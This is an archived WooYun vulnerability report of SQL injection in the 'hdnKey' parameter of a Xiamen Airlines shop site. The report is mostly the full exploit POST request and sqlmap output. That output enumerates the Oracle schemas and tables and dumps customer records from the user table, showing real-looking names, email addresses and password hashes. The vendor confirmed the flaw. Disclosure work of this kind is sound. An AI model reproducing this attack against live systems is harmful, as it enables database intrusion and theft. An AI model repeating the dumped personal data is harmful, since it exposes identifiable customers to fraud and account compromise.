当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124157

漏洞标题:厦门航空某分站sql注入漏洞

相关厂商:xiamenair.com

漏洞作者: 撸撸侠

提交时间:2015-07-02 18:12

修复时间:2015-08-20 10:02

公开时间:2015-08-20 10:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

详细说明:

POST http://shop.xiamenair.com/prolist.aspx?k=a HTTP/1.1
Host: shop.xiamenair.com
Proxy-Connection: keep-alive
Content-Length: 6841
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://shop.xiamenair.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://shop.xiamenair.com/prolist.aspx?k=a
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=15i2bh55102uuc3z34qndimd
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
__EVENTTARGET=paging1%24datPageNumber%24ctl01%24btnPageNumber&__EVENTARGUMENT=&__LASTFOCUS=&__LastVIEWSTATE_SessionKey=70914066-cf2b-49b9-900f-a78060093aba&__VIEWSTATE=%2FwEPDwUJNzUyNjI0NzYwD2QWAgIDD2QWDAIBD2QWAgIBDxYCHgtfIUl0ZW1Db3VudAIFFgpmD2QWAmYPFQIFMTAwNjEM5Y6m6Iiq54m56ImyZAIBD2QWAmYPFQIFMTAwMzMM5a625bGF55Sf5rS7ZAICD2QWAmYPFQIFMTAwMzAM5oi35aSW6L%2BQ5YqoZAIDD2QWAmYPFQIFMTAwMzIM5pWw56CB5a6255S1ZAIED2QWAmYPFQIFMTAwMzEM5ZOB54mM566x5YyFZAIDD2QWAgIBDxYCHwACBRYKZg9kFgRmDxUBBTEwMDYxZAIBDxYCHwBmZAIBD2QWBGYPFQEFMTAwMzNkAgEPFgIfAGZkAgIPZBYEZg8VAQUxMDAzMGQCAQ8WAh8AZmQCAw9kFgRmDxUBBTEwMDMyZAIBDxYCHwBmZAIED2QWBGYPFQEFMTAwMzFkAgEPFgIfAGZkAgUPFgIeBFRleHQFDyA%2BIOS6p%2BWTgeaQnOe0omQCCw8QZGQWAWZkAg8PFgIfAAIUFihmD2QWAmYPFQcDNTE3TFVzZXJGaWxlcy9Vc2VySW1hZ2VzL3N5cy8yMDEzLTEwLTA4LzE4OGM0ODZmLTA0OGUtNGRiYi04MDY3LTA2MWM4YzFkM2U3OS5qcGcDNTE3TTxzcGFuIHRpdGxlPSfkuZ3lrokoYW5kb24p55S15a2Q5L2T5rip6K6hJz7kuZ3lrokoYW5kb24p55S15a2Q5L2T5ripLi48L3NwYW4%2BBDMwMDAAAjM5ZAIBD2QWAmYPFQcDNTMwTFVzZXJGaWxlcy9Vc2VySW1hZ2VzL3N5cy8yMDEzLTA5LTI3L2Q0YWM2MDdkLTQ4ZmYtNDIyYi1iY2FjLWNmNDhkODE2Zjk5ZS5qcGcDNTMwUTxzcGFuIHRpdGxlPSfkuLnlpq7lpYfnibkoRGFuTmlRaVRlKeWFreinkui3s%2Bajiyc%2B5Li55aau5aWH54m5KERhbk5pUWlUZS4uPC9zcGFuPgQzNTAwAAMxMjFkAgIPZBYCZg8VBwM1MzVMVXNlckZpbGVzL1VzZXJJbWFnZXMvc3lzLzIwMTMtMDktMjcvY2I2MzU1OTEtM2I1ZC00ODI5LTgxMDItOThjOGJmNTcwMmU1LmpwZwM1MzVQPHNwYW4gdGl0bGU9J%2BaUgOiDvShQYW5vbinnmb7lj5jmipjlj6Dog4zljIUnPuaUgOiDvShQYW5vbinnmb7lj5jmipjlj6AuLjwvc3Bhbj4EMzUwMAACODRkAgMPZBYCZg8VBwM1NDVMVXNlckZpbGVzL1VzZXJJbWFnZXMvc3lzLzIwMTQtMDctMTYvMmYwNjVlM2MtMGVhNy00MTBmLWE0Y2EtMjA0MjEzYmMyN2Y2LmpwZwM1NDVhPHNwYW4gdGl0bGU9J%2BavlOW%2Bl%2BWFlChQZXRlclJhYmJpdCnphbfkuIDml4%2Fml7blsJrmjqfov5DliqjmsLTlo7YnPuavlOW%2Bl%2BWFlChQZXRlclJhYmJpdC4uPC9zcGFuPgQzNjAwAAIxNmQCBA9kFgJmDxUHAzU0M0xVc2VyRmlsZXMvVXNlckltYWdlcy9zeXMvMjAxMy0wOS0yNy9lMzZjNTg0Ny02ZTY4LTRlMGItOTkwNC0xYzhiMzhjZmVhMWYuanBnAzU0M0w8c3BhbiB0aXRsZT0n5ZOG5ZWmQeaipihEb3JhZW1vbinotK3niannr64nPuWThuWVpkHmoqYoRG9yYWVtb24p6LStLi48L3NwYW4%2BBDM4MDAAAzExMGQCBQ9kFgJmDxUHAzY5M0xVc2VyRmlsZXMvVXNlckltYWdlcy9zeXMvMjAxNC0wNi0wMy9kMjRhNDNiNC0wZGM1LTQ4NzctYTE2Zi1kNWMxOTRhM2M2MTYuanBnAzY5M2s8c3BhbiB0aXRsZT0n546b5ZCJ5Y%2Bv77yITWFnaWNBcnTvvInlhL%2Fnq6XnpLznianlpbPlrannjqnlhbflpZfoo4U0MjAwNTgwJz7njpvlkInlj6%2FvvIhNYWdpY0FydO%2B8iS4uPC9zcGFuPgQ1MjAwAAI3NGQCBg9kFgJmDxUHAzc3N0xVc2VyRmlsZXMvVXNlckltYWdlcy9zeXMvMjAxNS0wMS0yNy9jYmVhODg3Mi0xMDQ0LTRmZmEtYjU2Zi0xNDkwOTBjZDIwMjQuanBnAzc3N1w8c3BhbiB0aXRsZT0n5rSB5Li96ZuFKGdyYWNlKeaDheS%2Bo%2Bezu%2BWIl%2Bavm%2BW3vuS4ieS7tuWllyc%2B5rSB5Li96ZuFKGdyYWNlKeaDheS%2Bo%2Bezuy4uPC9zcGFuPgQ1ODAwAAI1MmQCBw9kFgJmDxUHAzc4MUxVc2VyRmlsZXMvVXNlckltYWdlcy9zeXMvMjAxNS0wMS0yNy8yMWE4MzM3OC01MTQ5LTQ4Y2UtOWUyMy0zZjExY2JjNTA4ODguanBnAzc4MVQ8c3BhbiB0aXRsZT0n6I2j5LqL6L6%2BUm95YWxzdGFy6IO96YeP5rqQ6YW45aW25py6Jz7ojaPkuovovr5Sb3lhbHN0YXLog73ph48uLjwvc3Bhbj4ENjIwMAACMTlkAggPZBYCZg8VBwM1ODdMVXNlckZpbGVzL1VzZXJJbWFnZXMvc3lzLzIwMTMtMDktMjcvMjNiYTJkYTgtYjBhYS00OWMxLThiYjctOWUwNWZmNjdlOTQ4LmpwZwM1ODdMPHNwYW4gdGl0bGU9J%2BiNo%2BS6i%2Bi%2BvihSb3lhbHN0YXIp5Yqg5rm%2F5ZmoJz7ojaPkuovovr4oUm95YWxzdGFyKeWKoC4uPC9zcGFuPgQ2ODAwAAI4MGQCCQ9kFgJmDxUHAzUwOExVc2VyRmlsZXMvVXNlckltYWdlcy9zeXMvMjAxMy0wOS0yNy8zZjdlYjZjOS1iYzU4LTQxOTQtOTJmMy1jNmJjMTM3YTJiYjMuanBnAzUwOGc8c3BhbiB0aXRsZT0n5a6d5qC855%2Bz77yIUG93ZXJvY2tzKU1hZ2ljc3RpY2so6a2U5Yqb5qOS77yJ56e75Yqo55S15rqQJz7lrp3moLznn7PvvIhQb3dlcm9ja3MpLi48L3NwYW4%2BBDgwMDAAAjY1ZAIKD2QWAmYPFQcDNzkzTFVzZXJGaWxlcy9Vc2VySW1hZ2VzL3N5cy8yMDE1LTAyLTI4LzdmZDA5YjIwLTI2OTgtNGY3Mi04N2ExLTM3MzIwMDYwNjhkMi5qcGcDNzkzVDxzcGFuIHRpdGxlPSfmlIDog70oUGFub24p6YeO6aSQ5Z6r5Yaw5YyFUE4tMjg2Nic%2B5pSA6IO9KFBhbm9uKemHjumkkOWeq%2BWGsC4uPC9zcGFuPgQ4MjAwAAIzOWQCCw9kFgJmDxUHAzcxMUxVc2VyRmlsZXMvVXNlckltYWdlcy9zeXMvMjAxNC0wOC0wMS9mNDY3OGVkYy1jNDFlLTRkNmQtYjc2MC1mNGIzYTA1MzRkNDguanBnAzcxMUw8c3BhbiB0aXRsZT0n6I2j5LqL6L6%2BKFJveWFsc3RhcinnlLXngpbplIUnPuiNo%2BS6i%2Bi%2BvihSb3lhbHN0YXIp55S1Li48L3NwYW4%2BBDg1MDAAAzI3OWQCDA9kFgJmDxUHAzgyNkxVc2VyRmlsZXMvVXNlckltYWdlcy9zeXMvMjAxNS0wNS0yNi9kYzMwNTU5YS02NzVhLTQ3MDktODcwNy0wZGE5YzUwOTQ0N2UuanBnAzgyNlY8c3BhbiB0aXRsZT0n546b5ZCJ5Y%2BvKE1hZ2ljQXJ0KeWwj%2BWwj%2BeUu%2BWutue7mOeUu%2Bebkic%2B546b5ZCJ5Y%2BvKE1hZ2ljQXJ0KeWwjy4uPC9zcGFuPgQ5MDAwAAI0OWQCDQ9kFgJmDxUHAzc5MUxVc2VyRmlsZXMvVXNlckltYWdlcy9zeXMvMjAxNS0wMy0wMi85ZGY5YjAwNi0wNGYxLTQ5NDItYjhhYi0zYTE3M2Q0M2Q2NjMuanBnAzc5MVQ8c3BhbiB0aXRsZT0n5pSA6IO9KFBhbm9uKee%2Bveavm%2BeQg%2BWll%2BijhVBOLTUxMjEnPuaUgOiDvShQYW5vbinnvr3mr5vnkIPlpZcuLjwvc3Bhbj4EOTAwMAACODdkAg4PZBYCZg8VBwM4MjNMVXNlckZpbGVzL1VzZXJJbWFnZXMvc3lzLzIwMTUtMDUtMjYvNzU1NmM3NWYtZmYyZi00ZWZiLTlmYzAtZTA0MzU5MzllZmNhLmpwZwM4MjNaPHNwYW4gdGl0bGU9J0dlcm1hbnkgZWl0ZWNo55uK5pm65ou86KOF546p5YW3IEZJ6LWb6L2mM%2BWQiDEnPkdlcm1hbnkgZWl0ZWNo55uK5pm6Li48L3NwYW4%2BBDk2MDAAAjM5ZAIPD2QWAmYPFQcDNzc5TFVzZXJGaWxlcy9Vc2VySW1hZ2VzL3N5cy8yMDE1LTAxLTI3L2Q0MGYxMzNkLTVjYzQtNDdkNS05ZjlmLTA1MmViOTllNjllMy5qcGcDNzc5WjxzcGFuIHRpdGxlPSfojaPkuovovr5Sb3lhbHN0YXLnsbPlpYfllpzmtq7mtq7nlLXngavplIUnPuiNo%2BS6i%2Bi%2BvlJveWFsc3Rhcuexs%2BWlhy4uPC9zcGFuPgUxMjAwMAACMzJkAhAPZBYCZg8VBwM2ODZMVXNlckZpbGVzL1VzZXJJbWFnZXMvc3lzLzIwMTQtMDQtMzAvNjg3YjhmY2ItNGViMy00YTE2LTk3MGQtM2VlMDdiOWU4YjljLmpwZwM2ODZnPHNwYW4gdGl0bGU9J%2BaAoeS4h%2BWutihpd2FraSlQQUNLUkFOR0Xkv53lrZjlrrnlmajnsonoibLlhbjpm4XkupTku7blpZcnPuaAoeS4h%2BWutihpd2FraSlQQUNLUi4uPC9zcGFuPgUxMzUwMAACMjBkAhEPZBYCZg8VBwM3OThMVXNlckZpbGVzL1VzZXJJbWFnZXMvc3lzLzIwMTUtMDMtMjcvYzE3YjExZjUtMmY2ZC00M2VjLWI2NjItMmE0NjlmMjlkYWE4LmpwZwM3OThrPHNwYW4gdGl0bGU9J%2Beip%2BeEtuW%2Bt01hcmVsbGHlnovlrrbnlKjmu6TmsLTlo7bvvIjkuJPnlKhNYXh0cmXmu6Toiq%2FvvIknPueip%2BeEtuW%2Bt01hcmVsbGHlnovlrrbnlKguLjwvc3Bhbj4FMTM4MDAAAjM0ZAISD2QWAmYPFQcDNDc2TFVzZXJGaWxlcy9Vc2VySW1hZ2VzL3N5cy8yMDEzLTA5LTI3LzQ2MWQ1MmFhLTkyYmEtNDY1My04YjUzLTgyYTMyOTJkOGI5ZS5qcGcDNDc2YTxzcGFuIHRpdGxlPSfmvKvlqIEoTWFydmVsKUlyb24gTWFu6ZKi6ZOB5L6g54%2BN6JeP54mI6YCg5Z6LVeebmCA4Ryc%2B5ryr5aiBKE1hcnZlbClJcm9uIE0uLjwvc3Bhbj4FMTUzMDAAAjM5ZAITD2QWAmYPFQcDNDc1TFVzZXJGaWxlcy9Vc2VySW1hZ2VzL3N5cy8yMDEzLTA5LTI3LzBkNmEyN2UwLTE3ZTEtNGZlYi1iMWZkLWE4M2JkZDRlNDZkMy5qcGcDNDc1YTxzcGFuIHRpdGxlPSfmvKvlqIEoTWFydmVsKUlyb24gTWFu6ZKi6ZOB5L6g54%2BN6JeP54mI6YCg5Z6LVeebmCA4Ryc%2B5ryr5aiBKE1hcnZlbClJcm9uIE0uLjwvc3Bhbj4FMTUzMDAAAjQ5ZAIbD2QWEgIBDw8WBB4LQ29tbWFuZE5hbWUFATEeB1Zpc2libGVoZGQCAw8PFgIfAgUBMWRkAgUPPCsACQEADxYEHghEYXRhS2V5cxYAHwACAmQWBGYPZBYCAgEPDxYIHghDc3NDbGFzcwUGc2VsZWN0HwEFATEfAgUBMR4EXyFTQgICZGQCAQ9kFgICAQ8PFggfBWUfAQUBMh8CBQEyHwYCAmRkAgcPDxYCHwIFATJkZAIJDw8WBB8CBQEyHwNoZGQCDQ8PFgQfAQUM5b2T5YmNMS8y6aG1HwNoZGQCDw8PFgIfA2hkZAIRDxYCHwNoZAIXDw8WAh8DaGRkZEoyf9GxPcSKJ%2FMqBlpUY9L3dMkx&__EVENTVALIDATION=%2FwEWFAK4q4bTCQLN6YG8BgKcwdqACwKbuLE0Ao3f1PsNAq7cqvkDAqGzgJcPAr6zgJcPAo2WzesDArm66GkCwMCFxgwCiI%2F%2B5wUCucDl8wICtqOelwcChenNkA4CndWR9AECnoClywICs%2FW6pQkCgfCm9g0C0v3x4wE6NCPiVTEtGjf8qeqsNyozfKJDBw%3D%3D&Left1%24txtKey=a&hdnMoneyState=0&hdnIsChange=0&ddlstOrderBy=1&hdnKey=a&hdnOrder=&hdnPageIndex=1&hdnOrderState=1&hdnPageSize=20&hdnNoteCount=28&paging1%24HFPageCount=2&paging1%24hdnPageIndex=1


参数hdnKey存在sql注入

漏洞证明:

[1] place: POST, parameter: hdnKey, type: Single quoted string
[q] Quit
> 1
[06:03:27] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
[06:03:27] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[06:03:27] [INFO] fetching database (schema) names
[06:03:27] [INFO] the SQL query used returns 4 entries
[06:03:27] [INFO] resumed: SYS
[06:03:27] [INFO] resumed: SYSTEM
[06:03:27] [INFO] resumed: XHSHOPADM
[06:03:27] [INFO] resumed: XMAIR
available databases [4]:
[*] SYS
[*] SYSTEM
[*] XHSHOPADM
[*] XMAIR


Database: XHSHOPADM
[30 tables]
+------------------------+
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| T_ADMIN |
| T_ADVERTISEMENT |
| T_AREA |
| T_BASETYPE |
| T_COLLECTION |
| T_FUNCTION |
| T_INDEXPICTURE |
| T_INFORMATION |
| T_LINK |
| T_ORDER |
| T_ORDERADDRESS |
| T_ORDERPRODUCT |
| T_ORDERPRODUCTDETAILED |
| T_PRODUCT |
| T_PRODUCTPICTURE |
| T_ROLE |
| T_ROLEFUNCTION |
| T_SCORESDYNAMIC |
| T_SHOPPINGCART |
| T_SHOPPINGCARTDETAILED |
| T_SYSCONFIG |
| T_USER |
| T_USERADDRESS |
| T_USERINFO |
| T_WEBSITE |
+------------------------+


[06:06:15] [INFO] fetching columns for table 'T_USER' in database 'XHSHOPADM'
[06:06:15] [INFO] the SQL query used returns 12 entries
[06:06:16] [INFO] retrieved: MILE
[06:06:16] [INFO] retrieved: NUMBER
[06:06:16] [INFO] retrieved: ID
[06:06:16] [INFO] retrieved: NUMBER
[06:06:17] [INFO] retrieved: USERNAME
[06:06:17] [INFO] retrieved: VARCHAR2
[06:06:17] [INFO] retrieved: NICENAME
[06:06:17] [INFO] retrieved: VARCHAR2
[06:06:18] [INFO] retrieved: PWORD
[06:06:18] [INFO] retrieved: VARCHAR2
[06:06:18] [INFO] retrieved: PHOTO
[06:06:18] [INFO] retrieved: VARCHAR2
[06:06:19] [INFO] retrieved: STATE
[06:06:19] [INFO] retrieved: CHAR
[06:06:19] [INFO] retrieved: SCORES
[06:06:19] [INFO] retrieved: NUMBER
[06:06:20] [INFO] retrieved: TYPEID
[06:06:20] [INFO] retrieved: NUMBER
[06:06:20] [INFO] retrieved: ADDDATE
[06:06:20] [INFO] retrieved: DATE
[06:06:21] [INFO] retrieved: EMAIL
[06:06:21] [INFO] retrieved: VARCHAR2
[06:06:21] [INFO] retrieved: XHCODE
[06:06:21] [INFO] retrieved: VARCHAR2
[06:06:21] [INFO] fetching entries for table 'T_USER' in database 'XHSHOPADM'
[06:06:22] [INFO] the SQL query used returns 55603 entries
[06:06:25] [INFO] retrieved: 20-6月 -11
[06:06:25] [INFO] retrieved: fsqing8412@sina.com
[06:06:25] [INFO] retrieved: 763
[06:06:25] [INFO] retrieved: 0
[06:06:25] [INFO] retrieved: 冯树清
[06:06:26] [INFO] retrieved: 82D7D9EB8BD9C785BD2FEE139A9D4809
[06:06:26] [INFO] retrieved: 1173
[06:06:26] [INFO] retrieved: 1
[06:06:26] [INFO] retrieved: 10017
[06:06:27] [INFO] retrieved: 1008646763
[06:06:27] [INFO] retrieved: 1008646763
[06:06:27] [INFO] retrieved: 20-6月 -11
[06:06:27] [INFO] retrieved:
[06:06:28] [INFO] retrieved: 764
[06:06:28] [INFO] retrieved: 818
[06:06:28] [INFO] retrieved: 王莲珠
[06:06:28] [INFO] retrieved: 32C036D19B5F79A7793A6B7F044797C7
[06:06:29] [INFO] retrieved: 258
[06:06:29] [INFO] retrieved: 1
[06:06:29] [INFO] retrieved: 10017
[06:06:31] [INFO] retrieved: 1005248473
[06:06:31] [INFO] retrieved: 1005248473
[06:06:31] [INFO] retrieved: 20-6月 -11
[06:06:31] [INFO] retrieved:
[06:06:32] [INFO] retrieved: 765
[06:06:32] [INFO] retrieved: 2464
[06:06:32] [INFO] retrieved: 施德伟
[06:06:32] [INFO] retrieved: 46A527F595D6BDA935A78C2E8B81C65B
[06:06:32] [INFO] retrieved: 5748
[06:06:33] [INFO] retrieved: 1
[06:06:33] [INFO] retrieved: 10017
[06:06:33] [INFO] retrieved: 1501131903
[06:06:33] [INFO] retrieved: 1501131903
[06:06:34] [INFO] retrieved: 23-6月 -11
[06:06:34] [INFO] retrieved: zhuangy1@hotmail.com
[06:06:34] [INFO] retrieved: 822
[06:06:34] [INFO] retrieved:
[06:06:35] [INFO] retrieved:
[06:06:35] [INFO] retrieved: A9DE938467D7CFEE864035FB9E7A22E9
[06:06:35] [INFO] retrieved: 896
[06:06:35] [INFO] retrieved: 1
[06:06:36] [INFO] retrieved: 10017
[06:06:36] [INFO] retrieved: 1005778966
[06:06:36] [INFO] retrieved: 1005778966
[06:06:36] [INFO] retrieved: 23-6月 -11
[06:06:37] [INFO] retrieved: ankchu@gmail.com
[06:06:37] [INFO] retrieved: 826
[06:06:37] [INFO] retrieved: 0
[06:06:37] [INFO] retrieved: 胡家铭
[06:06:38] [INFO] retrieved: A97CE004D298935F0DE16D314D8E2456
[06:06:38] [INFO] retrieved: 29325
[06:06:38] [INFO] retrieved: 1
[06:06:38] [INFO] retrieved: 10017
[06:06:39] [INFO] retrieved: 1009197000
[06:06:39] [INFO] retrieved: 1009197000
[06:06:39] [INFO] retrieved: 24-6月 -11
[06:06:39] [INFO] retrieved: hokarfai@gmail.com
[06:06:40] [INFO] retrieved: 832
[06:06:40] [INFO] retrieved: 0
[06:06:40] [INFO] retrieved: 何家辉
[06:06:40] [INFO] retrieved: 430B8CE2E25B1DDD5831E3F40F3FA332
[06:06:41] [INFO] retrieved: 49405
[06:06:41] [INFO] retrieved: 1
[06:06:41] [INFO] retrieved: 10017
[06:06:41] [INFO] retrieved: 1505055786
[06:06:42] [INFO] retrieved: 1505055786
[06:06:42] [INFO] retrieved: 06-6月 -11
[06:06:42] [INFO] retrieved: wentaoniu@sohu.com
[06:06:42] [INFO] retrieved: 529
[06:06:42] [INFO] retrieved: 0
[06:06:43] [INFO] retrieved: 牛文涛
[06:06:43] [INFO] retrieved: 24EA536C875D7564DB91371F72B6ECCB
[06:06:43] [INFO] retrieved: 10980

修复方案:

版权声明:转载请注明来源 撸撸侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-07-06 10:01

厂商回复:

已确认,谢谢对厦航信息安全工作的支持

最新状态:

暂无


漏洞评价:

评论